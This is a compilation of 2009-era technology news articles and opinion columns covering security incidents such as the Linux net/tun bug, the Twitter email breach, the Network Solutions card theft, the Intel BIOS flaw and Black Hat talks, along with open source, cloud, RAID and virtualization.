Two recent security events – one involving net/tun and a Linux compiler and the second involving Gmail, Hotmail, and Twitter – illustrate the challenges that chained exploits create. As I wrote last week in regard to the forthcoming Google Chrome OS, most - if not all - software must interact with other products and features if it's going to deliver the functionality that users demand. The trade-off can be weakened security.

The Linux kernel vulnerability emerged in the open source net/tun program. In this case, the bug was not written in to the net/tun program. Rather, when the program's source code is run through a Linux compiler for optimization, the complier introduces a kernel exploit. In particular, the compiler finds what it thinks is an unnecessary NULL value and removes an important IF-THEN statement. The subsequent exploits work even against improved security versions of Linux, such as SeLinux (see a video of a representative exploit).

The second example of a chained exploit is even more intriguing. In this case, a malicious hacker broke in to one or more Twitter employees' e-mail accounts, then publicly posted both personal and company confidential information.

The hacker accomplished this feat after discovering that a Twitter employee used Gmail and that a request for a new password for the account would be sent to the employee's Hotmail account. However, the employee had not used the Hotmail account in a very long time, so their Hotmail address was available for anyone to adopt.

by Matt Asay

At this week's Oscon conference, someone asked me what the secret to commercializing open-source software is, as if a secret cabal has been jealously guarding some arcane knowledge.

My response? "There is no secret: we simply don't know how to do it very well yet."

One thing, however, is clear: while the Web promises a brave new world of technical and financial prosperity, getting there from here is still very much in doubt. If we think of companies like Google as Software 2.0 and old-school vendors like IBM as Software 1.0, this leaves open-source vendors like Pentaho, MySQL, Zenoss, SugarCRM, etc. as very much Software 1.5 companies.

Or as tech journalist Glyn Moody suggests, we are in a "transitional phase, neither fish nor fowl."

I couldn't agree more.

To borrow Moody's nomenclature, much of the friction between free-software purists and open-source pragmatists stems from the malaise inherent in such an in-between state. The free-software advocates want out of the 1.0 world as soon as possible, but the vast majority of customers aren't ready to dive into Software 2.0, which leaves vendors uneasily borrowing from 1.0 business models while stretching toward 2.0 Web-based delivery mechanisms.

It's an ugly compromise at times, but it's unclear how to navigate it more cleanly than the industry already is.

Those of us working for Software 1.5 companies earnestly wish the future were already here. But after years of trying to abandon any remnants of proprietary software, it has become clear to many of us that the market-while ready to adopt open source on a grand scale-has yet to figure out how to pay for it.

I'd love nothing more than to give 100 percent of my software away for free and then charge for the service of maintaining it over the Web, or selling ads alongside content, or whatever. But the cold reality is that few enterprises actually want this, as measured by dollars they're spending. Not yet, anyway.

We are an industry in transition. Our business models have yet to catch up our delivery models. Until they do, expect a fair amount of conflict between a company's best intentions and the exigency-driven compromise.

by Dan Goodin

On Thursday morning, IT consultant Paul Nash received an urgent call from a client whose Apache webserver had crashed the previous night and inexplicably wouldn't restart. Equally vexing, people who tried to visit the client's website during the 10-hour outage received a message advertising TeamViewer, a maker of widely used software for remotely managing PCs and servers.

After 90 minutes of troubleshooting, Nash traced the problem to TeamViewer, which he used to remotely administer the client's servers. It turns out the program had opened up its own webserver on the client's machine as soon as Apache went down and in the process made it impossible for the client, a large provider of business software, to restart its proper website.

"At that point, basically the webserver is hosed because if Apache tries to start up again, it sees someone else on port 80 and it falls over and dies, which is kind of antisocial behavior," Nash, who is the principal at Toronto-based Nash Networks, told The Register. Nash was able to get Apache up and running again by killing TeamViewer processes on the server, but by then, the client "had quite a bit of irate support requests stacked up."

The incident highlights a serious liability that comes from using what he otherwise regards as a great tool for remotely managing the thousands of PCs and servers entrusted to him. But what really sticks in Nash's craw, he said, is the blase attitude TeamViewer support people showed when he reported the SNAFU.

"They said they don't see what the problem is," he said.

After he escalated the complaint, Nash finally received instructions for modifying the registry of machines running TeamViewer so its webserver won't automatically start should the normal webserver go down. But this requires him to put his hands on every machine he manages, a solution that's needlessly cumbersome.

Also concerning, said Nash, is TeamViewer's lack of disclosure that its software is receiving incoming traffic sent to machines that run the software.

"They're sitting in the middle and they're in a position to snoop on all my traffic," he said, adding that he thinks that scenario is unlikely. Still, when Nash learned that TeamViewer does monitor for incoming web requests, he said it made him wonder: "What else aren't they telling us?"

TeamViewer's website claims the software has more than 15 million installations in 50 countries. Company representatives didn't immediately respond to requests for comment sent early Friday evening Germany time. We'll be sure to update this article, if they get back to us.

by William Hurley

I've really enjoyed writing for you for the past 7 months, but it's time for me to do a little less writing about cloud computing and a whole lot more working in the cloud.

Catchy, huh? Alas! This is my last InfoWorld Cloud Computing post. I've really enjoyed writing for you for the past seven months, but my mounting responsibilities mean it's time for me to bow out. I'm going to do a little less writing about cloud computing and a whole lot more working in the cloud. In fact I've just posted a "Down-to-Earth look at Cloud Computing" podcast on BMC's new Cloud Computing Community.

Never fear. Neither I nor InfoWorld's Editor in Chief Eric Knorr would leave you in a lurch. David S. Linthicum (Dave) will be taking the helm, and man does he bring a lot of insight. Dave is an internationally recognized industry expert and thought leader. He's authored or coauthored 13 books on computing, including the best-selling "Enterprise Application Integration" (Addison Wesley). He's also a well-known keynote speaker on the conference circuit and works with several cloud computing startups. The column couldn't be in better hand. Before I sign off, I'll leave you with three things I would like you to take away from my time here:

1. Keep the hope; lose the hype.

It's really easy to get caught up in all of the hype surrounding cloud computing, and just as easy to lose hope in it when you've weeded through the overwhelming amount of crap that's out there. As I've said before, continuing to market cloud computing as the next magic bullet will guarantee dissatisfaction. We need a Windex-clear definition to take this buzzword from cotton candy to New York cheesecake. Eric has raised this flag several times in his blog, going so far as to offer the industry a standard definition: "the use of commercial computing services, including software-as-a-service applications, delivered over the Internet." It's up to us to the community to make this tangible and concrete.

2. Be realistic about what you're getting into.

Once I asked readers: Does cloud computing eliminate complexity? Sure, cloud computing is a celebrated "new" technology, but we got ourselves all wrapped up in it before we understood its repercussions. Do yourself a favor and examine cloud offerings against some realistic metrics for what you and your organization consider success. And don't forget the Law of Unintended Consequences. Moving components from your internal infrastructure to the cloud probably won't reduce complexity, just brush it under the rug. "Out of sight, out of mind" sounds good until it's the foundation for your IT infrastructure.

3. Cloud computing isn't evil.

Privacy is important, but it's not the only issue. Regulatory compliance and a host of other potential challenges face companies deploying cloud technologies, but most of these will be worked out over time. Cloud computing isn't inherently good or evil; technology is technology. Its effects on your organization are a direct result of the planning and management you put into its deployment and operation.

There's my short list. Now I sign off for the last time. Thanks to Eric and InfoWorld for giving me the opportunity to participate in this community, and thanks to Dave Linthicum for stepping in to take over this column. If you're interested in following what's next for me just add me on Twitter, or drop me a line

by Elinor Mills

My favorite security show each year is one at which there are no sales pitches, the speakers favor black T-shirts and dyed hair over suits and ties, and the talks tend to be controversial enough to prompt legal threats and even arrests.

I'm talking about Defcon, which starts Thursday and runs through Sunday. The event turns part of the Las Vegas strip into a geek equivalent of "Animal House" for a three-day weekend every summer.

Started in 1993 by Jeff Moss, aka Dark Tangent, Defcon brings together some of the top security experts from around the world, along with thousands of hacker wannabes whose pranks in previous years--hacking the elevators and ATMs and cementing the toilets, to name a few-have led to bans at certain hotels.

"One good thing about the (economic) downturn is that the Riviera Hotel has been easier to deal with," said Moss, who was recently named to the Homeland Security Advisory Council. "They're letting us have access to the pool, so we'll have pool parties, and they've allowed us to do more social things that we wanted to do."

In addition to being a hacker playground and summer camp, Defcon is a semi-neutral ground where people who blur the lines of legality mingle with federal agents whose job it is to hunt them down.

Moss also heads up Defcon's big-sister conference, Black Hat, whose briefings schedule runs Wednesday and Thursday at the more upscale but no less kitschy Caesars Palace. (Black Hat training sessions started over the weekend.)

While Black Hat is more professional, with vendor tables in the lobby and respectable product presentations in meeting rooms, Defcon is a chaotic tableau of goth-attired groupies, script kiddies hunkered over laptops lining the hallways at all hours of the night and gray-haired hackers who were likely teens when they first started coming to the event.

The presentations are usually top-notch (many of them duplicates from the more expensive Black Hat show), but Defcon is known just as much for the activities going on outside of the sessions.

There's Hacker Jeopardy, Hacker Karaoke, an artwork contest, geo-caching events, a beverage cooling contraption contest, organized target shooting, a Capture the Flag penetration testing competition, lock picking workshops, a PGP Key Signing Party, DJs, a scavenger hunt, the highly popular Spot the Fed contest, a competition to find the best social engineer and a Cannonball Run car race described as "a race against time over 288 miles of road" from Redondo Beach to Las Vegas on Thursday.

Despite the recession, both events are expected to be crowded.

"We had been expecting 30 percent fewer attendees and in reality we're only going to have 10 to 15 percent fewer," Moss said. "The market went down and all of this research came up."

The research topics run the gamut of vulnerabilities and exploits on everything from iPhones to smart grids. One session deals with air traffic control security (or lack thereof). Others have to do with injecting electromagnet pulses into the wiring system of jets, insecurities with Firefox plug-ins, cloud computing security issues and a new tool to send controversial news to censored countries without using proxy servers.

Unveiling a darknet
Several researchers are going to release a tool for hacking into Oracle databases. Meanwhile, two Hewlett-Packard researchers plan to demonstrate a proof-of-concept browser-based darknet type of network called "Veiled" that allows for the creation of a secure, decentralized peer-to-peer network in which no client software is downloaded.

"The clients are the owners of the files and there is no single point of failure," said Matt Wood, a senior researcher in the Web Security Research Group at HP Software and Solutions. "No one in the government can go to you and say 'we need the files.'"

Interesting session titles include "Cracking 400,000 Passwords, or How to Explain to Your Roommate why the Power Bill is a Little High," "Manipulation and Abuse of the Consumer Credit Reporting Agencies," "Hacking Capitalism '09," and "'Smart' Parking Meter Implementations, Globalism, and You (aka Meter Maids Eat Their Young)."

There's always a Meet the Fed panel with representatives from all the major defense and security-related government agencies. And well-known keynote speakers and presenters include Robert Lentz, chief security officer for the Department of Defense; Rod Beckstrom, former Director of the National Cyber Security Center in the U.S. Department of Homeland Security; Adam Savage, co-host of the "MythBusters" TV show; and perennial favorite Bruce Schneier, security guru and chief technology officer of BT Counterpane.

When hackers go public with details on exploits, vendors get nervous--companies have moved to block presentations at the shows over the years. This year is no exception. Juniper Networks pulled a talk one of its researchers was set to give about a flaw in ATM software after the ATM vendor complained. In his presentation entitled "Jackpotting Automated Teller Machines," Barnaby Jack was planning to provide a live demonstration of an attack on an automated teller machine.

"I'm disappointed Barnaby Jack's talk was canceled," said Moss. Another speaker this year was "forced or encouraged" not to release a tool, Moss said, but he couldn't remember which speaker or talk it was.

Last year, a talk on hacking smartcards used in the Boston subway system was blocked after a federal judge granted the Massachusetts transit authority's request for an injunction. In 2005, a security researcher was sued after giving a presentation at Defcon on how attackers could take over Cisco Systems routers. And in 2001, the FBI took Russian crypto expert Dmitry Sklyarov into custody at his Las Vegas hotel the day after he gave a Defcon talk about insecurities in e-book security software. All cases were eventually settled.

Defcon averted another type of legal debacle this year--the importation of its microprocessor-dependent badges, which are needed for the badge-hacking contest.

"I'm excited the badges for Defcon will be here," Moss said gleefully. "They were held up in Chinese customs for two months. It was a complete nightmare."

by Joe Fay

The world was given an insight into how both Twitter and the UK's e-government work today when the national media discovered one of Whitehall's in-house self-proclaimed web geek's guide to using Twitter.

Neil Williams, head of corporate digital channels at the Department for Business, Innovation and Skills, quietly posted his compact 5,382 word guide to setting up UK.gov Twitter feeds here last week. Highlighting the lightning speed at which web 2.0 can work, by this morning it was plastered all over the papers.

The guide pitches Twitter as "free to use with a relatively low impact on resources (with) the potential to deliver many benefits in support of our communications objectives".

It is, Williams says, "experiencing a phenomenal adoption curve in the UK and being used increasingly by government departments, Members of Parliament, a number of our stakeholders as well as millions of businesses, non government organisations and individuals."

So of course, the government would be mad not to use it. It's not like you're going to be relying on bumping into the first three of these groups walking down Whitehall, or wandering around the palace of Westminster, or on the diplomatic cocktail round. And clearly the rest have given up on boring old newspapers, TV, radio, etc.

Williams advises his colleagues that using Twitter means government depts can present folk with "an informal, 'human' voice of the organisation to promote comprehension of and engagement with our corporate messages".

At the same time, he warns, there are risks associated with breaches of Twitter etiquette, such as "Criticism arising from an inability to meet the demands of Twitter users to join conversations/answer enquiries, due to resource and clearance issues".

Even worse, there is the risk of inappropriate content being unleashed. This of course should be managed through the traditional methods of leaking and briefing-against one's political and departmental enemies.

Still, a credible operation can be up and running for just an hour a day's work from a department's Digital Media team, Williams reckons. That includes "sourcing and publishing tweets, co-ordinating replies to incoming messages and monitoring the account".

That's not all in one burst though. Messages - sorry, tweets - should be spaced at least 30 minutes apart, with a minimum of two tweets and a max of ten. Yes, that's how often and how much you need to show you're human.

We're not sure what the digital media team members will be doing the rest of the time, but we're imagining at least some of it will involve walking down Whitehall, wandering around the palace of Westminster, doing the diplomatic cocktail party round, etc.

We wondered how this sudden brush with fame had affected Williams. We went to his Twitter feed, naturally, but he now appears to be coyly protecting his tweets. His blog is up and running, though, and provides some background; amongst other things, he describes himself as a "lapsed comedy writer". ®

by Douglas Quenqua

By now, you probably know your Facebook friends' five favorite albums, TV stars, and sodas. Blame Tim O'Shaughnessy, creator of LivingSocial, the site's most-used and most-annoying application ever. We asked him to explain himself.

What inspired the app?

We heard rumors about Facebook's redesign and were thinking of ways to tap into the new stream concept. We wanted something that made it really, really easy for people to form opinions and then share them with everyone.

Do you think people hate you a little for that?

If LivingSocial is showing up in your stream, it's because your friends want you to know more about them. Talk to them, not us.

What do you do with all the data?

We go to marketers and say, "Here are a couple million people into music, and here are a couple million into movies." We're working with American Idol, Green Day, TNT, a lot of large brands.

Do you think folks realize you're making money off their confessions?

I think people understand that if something's free, there's some form of monetization involved.

List your least favorite things about Facebook.

One, apps aren't a part of Facebook on the iPhone, even though they're an integral part of the Facebook experience. Two, I wish Facebook would figure out news. And three, I wish Facebook would just hurry up and buy Twitter so there'd be less noise in the world.

by Elinor Mills

Network Solutions is investigating a breach on its servers that may have led to the theft of credit card data of 573,928 people who made purchases on Web sites hosted by the company.

Networks Solutions notified 4,343 of its nearly 10,000 e-commerce merchant customers on Friday about the breach. It affects 573,928 cardholders whose name, address, and credit card number were exposed between March 12 and June 8, said Susan Wade, a spokeswoman for Network Solutions.

Mysterious code was discovered in early June on servers hosting e-commerce customer sites during routine maintenance, she said. The company called in a third-party forensics team to help with the investigation, and the team was able to crack some of the code on July 13, determining that it could be related to credit card data, she added.

Credit card transactions were intentionally diverted by an unknown source from certain Network Solutions servers to servers outside, Network Solutions wrote in an e-mail to merchant customers.

"So we notified law enforcement and began the process of notifying our customers," Wade said. "At this point, we don't have a reason to believe that (the data) has been used, but we are working with the credit card companies," nonetheless.

Network Solutions also is paying to have credit-monitoring specialist TransUnion help the merchants notify their customers according to data breach notification laws in effect in certain states. Affected consumers will get 12 months of free credit-monitoring services.

It's unknown how the malicious code got onto the system and where it came from, Wade said.

Merchants and consumers can get more information on the Care and Protect Web site Network Solutions has set up. "We really feel terribly about this," Wade said.

"We store credit card data in an encrypted manner, and we are PCI (Payment Card Industry)-compliant. Unfortunately, any company operating in our business could have become a victim of this type of invasion," the company said on a blog post on the customer information Web site. "In this situation, the unauthorized code appears to have transmitted information about credit card transactions as they were being completed; it did not involve a vulnerability in the way we store data in our systems."

The breach does not affect Network Solutions' other businesses, which include domain registration, e-mail hosting, and online marketing.

by Chris Mellor

The RAID industry standard for storage is RAID-6, with recovery from a double drive failure. But it's not going to be good enough as disk capacities increase, prolonging failed disk rebuild times and so lengthening the window of unrecoverable failure if a third disk fails before the recovery from a double drive failure is complete.

This point is made by Adam Leventhal of Oracle/Sun's Fishworks in a blog. He says hard drive capacity roughly doubles every year but hard drive bandwidth is pretty constant, so it takes longer and longer to write data to fill up a drive.

Other things being equal, a 500GB drive will take twice as long to write as a 250GB drive. Suppliers are now producing 2TB drives, taking four times as long to fill with data as a 500GB drive; Leventhal implying that it will take about eight hours.

Assume 3TB drives are coming, then 4TB ones, and we're looking at 12 hours and 16 hours respectively for a rebuild of a full failed disk. Every added terabyte adds four hours to the rebuild time, half a day. That's increasing the chances a third drive will fail in the rebuild period for second and first failed drive rebuilds.

Leventhal has added triple-parity RAID to Sun's ZFS filesystem, calling it RAIDz3. He suggests calling it generically RAID-7 or RAID-8 might be silly. RAID-6 is often known as RAID-DP though, so RAID-TP would seem logical. Leventhal says it too could be superseded if disk capacities keep on growing.

That has to be logically true but, if the use of 3.5-inch disks switches over to 2.5-inch drives then that would reduce failed disk rebuild times. It would also likely increase the number of drives in an array, putting us back, roughly speaking, at square one.

Triple-parity RAID-Z will be included in the next major software release for Oracle/Sun's 7000 series sometime in the third quarter of this year; in other words, in a few weeks. It's not a first though - Avante Digital had a triple-parity EasyRAID product in 2006.

We might expect triple-parity RAID to start appearing, perhaps as an option, in mainstream enterprise EMC, HDS, HDS, IBM and NetApp arrays, and third-party RAID controllers from next year. ®

by Robert McMillan

Flaws in the way some mobile-phone networks handle SMS (short message service) signaling data could leave them open to a whole new range of attacks.

At this week's Black Hat conference in Las Vegas, researchers Zane Lackey and Luis Miras will show how they were able to spoof SMS and MMS (multimedia messaging service) messages and falsify the signaling data that underlies these messages.

Neither researcher was able to comment for this story, but in a description of their Thursday talk, posted to the Black Hat Web site, they say that they plan to release SMS hacking tools and will demonstrate an iPhone-based application that can be used in several SMS attacks. "SMS is also one of the only mobile phone attack surfaces which is on by default and requires almost no user interaction to be attacked," they say in their talk abstract.

The researchers were able to send SMS messages from one phone to another that contained configuration information that would normally originate only on the network's servers, according to a source familiar with the talk, who spoke on condition of anonymity because he was not authorized to speak on the matter. The research details security flaws in the way some mobile networks communicate with the devices on the network. "Basically, they found that there is a way to bypass all of the source sender validation," the source said.

The iPhone tool, which runs on a jailbroken version of the device, lets them send SMS messages with data that should normally only be sent from the carrier network, the source said. "They have found a new attack vector by which people can try to exploit phones based upon invalid assumptions the network operators and the phone operators have made about the security of this communications channel."

The attack works on the GSM (Global System for Mobile Communications)-based networks used by carriers such as AT&T and T-Mobile, but does not work on CDMA (Code Division Multiple Access) networks, he said.

It's not clear how dangerous such an SMS-based attack could be, or what exactly the researchers were able to do with their spoofed messages, but carriers use SMS to send basic configuration to the phones. In theory, an attacker might be able to use this technique to redirect a phone's Web browser to a malicious server or change voicemail notifications.

"We will discuss attacking the core SMS and MMS implementations themselves, along with 3rd party functionality that can be reached via SMS," the researchers write in their abstract.

SMS uses a communications channel that was designed as a way for network operators to send basic status updates between mobile phones and the network, and only later did it evolve as an extremely popular way to send short messages between mobile-phone users.

The network servers that handle SMS traffic are built by companies such as Ericsson, Nortel, Lucent and Nokia Siemens.

Mobile carriers have long tightly controlled the software and devices that can be used on their networks, but apparently, these networks are not as tightly controlled as was previously thought. "They're not as open as the Internet, but there are definitely lots of bad things that you can do that people never expected," the source said. "There are lots of malicious things you can do."

by Matt Asay

Intuit announced on Monday that it has launched a community site for open-source developers to write open-source SaaS (software as a service) applications that enhance Intuit's own SaaS platform. Glyn Moody derides the move as "a rather feeble attempt to plug into the power of openness without really engaging with it," but this misses the point.

The point is to enhance the value around an already valuable platform (Intuit's software). This isn't just of benefit to Intuit, but also to the third-party developers who contribute. No one wants to write software to sit on a shelf, unused. Coding for Intuit ensures a ready-made audience of small businesses.

What's not to like about that?

IBM's Savio Rodrigues notes that this same effect could have been achieved with a closed-source community site, but he suggests a few reasons open source makes the community site richer:

(B)y using an open source license, Intuit reduces a potential issue for its partners that do sell open source products on top of Intuit's platform. Intuit also makes it easier for its partners to customize the code for their own purposes, something that partners are likely to do. Lastly, the open source license encourages Intuit's ecosystem to contribute their own components and, thereby, helps raise all boats, without having to open source Intuit's core products. It seems like a win-win to me.

Agreed. Intuit clearly "gets" that open source is a means to an end, not an end in and of itself. Openness helps the company accomplish community and corporate goals. It helps to enrich its partner experience. But it's not a revenue model that the company is embracing.

Some will see this move by Intuit as more about artifice than community, but they will be wrong. The Intuit community stands to benefit greatly from this move. As with Microsoft before it, these Intuit partners are looking for ways to enhance the value of their offerings while building on a winning platform.

Open source helps them to do that, as ZDNet's Sam Diaz points out, while also helping Intuit to increase the value of its platform. It's a win-win situation.

by John Leyden

Intel has warned that some of its motherboards contain a flaw in their BIOS setup that creates a privilege escalation vulnerability.

As a result of the security bug, users already logged in as administrators could change code running in System Management Mode. SMM is a privileged operating environment that operates outside of operating system control, creating a possible mechanism (at least in theory) for mounting rootkit-style attacks on vulnerable systems.

Exploiting the bug would probably require physical access to affected systems, a fair amount of skill and not a little luck in locating a vulnerable box.

Desktop and server systems are both potentially affected by the bug, described by Intel as "important", so the flaw still merits close attention.

BIOS updates designed to mitigate against attack are available for vulnerable Intel motherboards, as explained in an advisory by the chip giant issued on Wednesday.

Intel lists the following desktop motherboards as potentially vulnerable: D5400XS, DX58SO, DX48BT2, DX38BT, DP45SG, DQ45CB, DQ45EK, DQ43AP, DB43LD, DG41MJ, DG41RQ, DG41TY, DG45ID, DG45FC, DG43NB, DP43TF, DQ35JO, DQ35MP, DG33BU, DG33FB, DG33TL, DP35DP, D945GSEJT, D945GCLF, D945GCLF2.

Intel Server Boards in the S3000, S3200, S5000 series, S5400 series, and S5500 series also need a BIOS update.

BIOS-related security flaws are rare but not unprecedented. The latest bug was discovered by researchers from Invisible Things Lab. Last year, the same researchers detailed a high-privilege rootkit vulnerability in Xen hypervisor that Intel addressed via a Bios update.

Invisible Things is due to present new research on attacking Intel BIOS at this week's Black Hat conference in Las Vegas, which is likely to be dominated by a detailed dissection of the issues arising from Intel's latest BIOS security advisory. ®

by Jeremy Kirk

A group of developers has released open-source software that gives administrators a hand in making the Internet's addressing system less vulnerable to hackers.

The software, called OpenDNSSEC, automates many tasks associated with implementing DNSSEC (Domain Name System Security Extensions), which is a set a set of protocols that allows DNS (Domain Name System) records to carry a digital signature, said John A. Dickinson, a DNS consultant working on the project.

DNS records allow Web sites to be translated from a name into an IP (Internet Protocol) address, which can be queried by a computer. But the DNS system has several flaws dating from its original design that are being increasingly targeted by hackers.

By tampering with a DNS server, it's possible for a user to type in the correct Web site name but be directed to a fraudulent site, a type of attack called cache poisoning. That's one of many concerns that is driving a movement for ISPs and other entities running DNS servers to use DNSSEC.

With DNSSEC, DNS records are cryptographically signed, and those signatures are verified to ensure the information is accurate. Adoption of DNSSEC, however, has been held back by both the complexity of implementation and a lack of simpler tools, Dickinson said.

To sign DNS records, DNSSEC uses public key cryptography, where signatures are created using a public and private key and implemented on a zone level. Part of the problem is management of those keys, since they must be refreshed periodically to maintain a high level of security, Dickinson said. A mistake in managing those keys could cause major problems, which is one of the challenges for administrators.

OpenDNSSEC allows administrators to create policies and then automate managing the keys and signing the records, Dickinson said. The process now involves more manual intervention, which increases the chance for errors.

OpenDNSSEC "takes care of making sure that zone stays signed properly and correctly according to the policy on a permanent basis," Dickinson said. "All of that is completely automated so that the administrator can concentrate on doing DNS and let the security work in the background."

The software also has a key storage feature that lets administrators keep keys in either a hardware or security software module, an additional layer of protection that ensure keys don't end up in the wrong hands, Dickinson said.

The OpenDNSSEC software is available for download, although it is being offered as a technology preview and shouldn't be used yet in production, Dickinson said. Developers will gather feedback on the tool and release improved versions in the near future.

As of earlier this year, most top-level domains, such as those ending in ".com," were not cryptographically signed, and neither were those in the DNS root zone, the master list of where computers can go to look up an address in a particular domain. VeriSign, which is the registry for ".com," said in February it will implement DNSSEC across top-level domains including .com by 2011.

Other organizations are also moving toward using DNSSEC. The U.S. government has committed to using DNSSEC for its ".gov" domain. Other ccTLDs (country-code Top-Level Domains) operators in Sweden (.se), Brazil (.br), Puerto Rico (.pr) and Bulgaria (.bg), are also using DNSSEC.

by Matt Asay

Enterprise IT sometimes behaves like the group of teenagers I counsel on a weekly basis as part of my church responsibilities: "Damn the future, let's live for the present!"

Stephen O'Grady offers a pungent critique of this nearsighted tendency in enterprise IT, especially as it pertains to the cloud:

Very much like Apple on the consumer level, (commercial cloud providers) Google et al demand sacrifices in return for convenience. Perhaps-or make that likely-realizing that businesses will invariably sacrifice the future at the altar of the present. We'll give you the convenience and time to market now; just don't expect to leave later.

And it's hard to blame (enterprise IT) for that, honestly. They've got jobs to do and kids to feed, and their blind trust in the technology industry to police itself and not lock them in this time as they've been locked in so many times before is as Peanuts touching as it is naive. Whether Lucy will yank the football out from under them yet again depends, as far as I can tell, on open source.

Why open source? Because open source helps to keep vendors like Google and Amazon honest by offering open alternatives to closed clouds (e.g., Eucalyptus).

Also, it's very possible that cloud computing will be nudged open in important ways due to the furor raised over proprietary practices.

This isn't simply a matter of open-source advocates castigating companies for locking in customers. It's also a clever sales tactic that an increasing array of companies will use to win over customers leery of signing over their data to a proprietary cloud provider, seemingly once and for all.

As the cloud gains relevance, we'll see an increasing array of companies that deliver software as a service (SaaS), but provide an "eject" mechanism via open-source, on-premise offerings. SugarCRM does this now, and I think we'll begin to see this more and more often.

The reality is that the service will be compelling enough to keep customers from bolting. But offering the safety blanket is worthwhile, even if no one ever uses it (and, frankly, I doubt many will, because very few are capable or running their own cloud, and even fewer want to).

O'Grady concludes that "Whether open source takes a role front and center...remains to be seen, but is certain that it will-as it has to date-have a crucial role in shaping the cloud market to come." How significant that role is largely up to us.

Disclosure: I am an advisor to SugarCRM.

by Dale Vile

Reader Workshop Roundup of discussion from Week 1. The feedback on virtualization experiences from those participating so far in our latest online workshop has been generally very positive.

A main focus of the comments has been on server consolidation and the cost savings that come with it, and some of the results achieved seem pretty impressive:

We're running about 15 VMs per server: a mix of Windows and FreeBSD mostly, some high power (e.g. mail), some low power, but there's still plenty of room for more. Virtualization rocks.

Yeah, it's great. We've squished over 50 intermittent-use/low-load internal servers into 6U of space.

"I work for local government, and we have consolidated close to 25:1 on x86 Windows servers over a 2 year period. We also have been re-deploying virtualised hardware servers (if decent spec/age) instead of purchasing new hardware servers."

We have been studying the benefits of virtualization and have started deploying it at a larger scale since last year. We were planning for a 10:1 to 16:1 consolidation ratio. I believe we are targeting 14:1 to 20:1.

However, whether high consolidation ratios are more an indication of how poorly the server environment was previously run is something that a couple of readers came back with as a challenge:

How are people running boxes running at <5% capacity before this?

If you do though run lightly loaded apps then you don't need a VM to run several of them on the same physical server; you just install them directly. For managing resources, then, VMs seem to gain you nothing. So what's the win? Do departments just get sloppy with resource management or what?

Those with experience stood their ground, though, and came back with points highlighting some of the operational, risk and quality of service related benefits:

...Which is all well and good until two vendors' packages conflict. Or you have to tell the people using the other 10 applications you installed 'Sorry, rebooting the server, nothing to do with your stuff, it's the other guy's, but it's all on the same box...'. Virtualization minimizes the hardware while still keeping each vendor's tech support happy and minimizing conflicts and single-points-of-failure.

25 apps on the same OS install, with overlapping ports, libraries, web servers, drivers... one vulnerability on 1 app and a hacker has all of your infrastructure, nice. Need to do a hardware update, just your entire business down while you re-install 25 apps. Have a poor app with a memory leak = crash entire business for a while, instead of 1 app down.

The benefit of virtualization to our disaster recovery solution can't be overstated. We backup virtual machine folders on to disk and tape. Simple, fast, no expensive 'backup agents' or other complexity required and can be restored onto any hardware.

Other benefits highlighted include the ability to run a higher proportion of your applications on high availability hardware, something which can be cost-prohibitive when your server estate is fragmented across a large number of under-utilised single function servers. The ability to run up test and development environments on demand, and respond quickly and easily to other requirements for other tactical applications without having to procure and provision new servers, was also cited.

And we also shouldn't forget that in a smaller environment with relatively light loads, even if you are still left with spare capacity following a consolidation exercise, there is nothing wrong with this. The point being that the kind of operational and service delivery benefits called out by readers still exist, even if you aren't squeezing every last usable cycle out of your kit:

Currently running 4-5 vms per physical server and seeing very low usage as we have a small user base 12-15% cpu.

But the feedback wasn't all positive. One of the downsides mentioned during the discussion, for example, was the real cost of implementing a virtualised environment, which sometimes only becomes apparent down the line:

Didn't spend enough on the disk storage, and now we have run out. Upgrading this is going to cost lots, possibly more than the initial roll out. We [also] maxed out our memory at the time. Sadly we have used pretty much all of it and again this will cost lots to upgrade.

...we may save tons of money on the server hardware, but we spend the savings on the software and supporting [network and storage] hardware... every four physical servers we buy needs to come with a networked disk, and a switch (or two)

The only blockage at the moment is cost; once it is cheaper to virtualise all our kit than to maintain the existing setup, we'll probably end up with one massive NAS and virtual suite, and the only external remaining part being backups

The points coming across here are very important to take on board for anyone just getting into the virtualization game. While it can be very easy to get going with free or low-cost hypervisors offering basic functionality, as you scale up your activity in a production environment, significant additional demands will be placed on both your storage and network infrastructure, which may mandate upgrades.

It is also worth thinking ahead about some of the operational implications in terms of execution and administration. If you get to the point where you need to think about load balancing and enhanced management capability - eg to avoid lots of manual overhead - then you may need to stump up for licences to run more advanced versions of software and tools.

With Microsoft and Citrix now challenging VMware in this space, one of the biggest discussions in the industry at the moment is how vendors will package, bundle and price the various components required for customers as they virtualize on a larger scale.

We'll be picking up the question of costs in a later discussion, and inviting your feedback at that time.

Meanwhile, the second article in our workshop concerning the use of virtualization beyond the kind of consolidation projects we have been discussing prompted much less feedback and discussion. Given the amount of attention being paid to resource pooling and dynamic virtualization - aka cloud computing technology - by vendors and pundits, this is perhaps another example of the seller community being ahead of the buyers and users.

If you have any thoughts on this, or any of the other aspects of virtualization we have discussed in this roundup, feel free to have your say as usual in the comments. ®

by Robert McMillan

At Black Hat this week, security researchers showed how a technically savvy hacker can make a fake payment card that allows unlimited free parking on San Francisco's smart parking meter system.

by Dave Rosenberg

A recent study released by ABI Research says that limited processing power, battery life, and data storage will limit mobile application growth in the mass market, even among smartphones like Apple's iPhone.

But, applications that connect to cloud resources are much more likely to be successful than those that run only on the mobile device.

ABI Research predicts mobile cloud computing will deliver annual revenues topping $20 billion over the next five years. ABI Research senior analyst Mark Beccue says device fragmentation and memory currently limit the level of sophistication developers can deliver through mobile apps. By contrast, running mobile applications in the cloud will free up mobile processors while also enabling developers to create just one version of their application.

"Cloud computing will bring unprecedented sophistication to mobile applications," noted Beccue. "To mention just a few examples, business users will benefit from collaboration and data sharing apps. Personal users will gain from remote access apps allowing them to monitor home security systems, PCs or DVRs, and from social networking mashups that let them share photos and video or incorporate their phone address books and calendars."

Funambol, an open-source mobile cloud sync company, seems to agree with this view of the future. When I spoke to Fabrizio Capobiano, CEO at Funambol, he said: "Mobile cloud sync is emerging as a major new category of wireless services. Apple, Google, Nokia, Microsoft, Palm, and others recently introduced mobile cloud sync services and all mobile operators and ISPs are racing to keep up. Current solutions are fairly basic, but open source is enabling more flexibility and innovation among these folks because it is so easy to adapt."

You can hear more about open source and mobile cloud sync from Mike Taczak, a team lead for Webmail apps at Rackspace, as he describes how the company uses Funambol in the video below.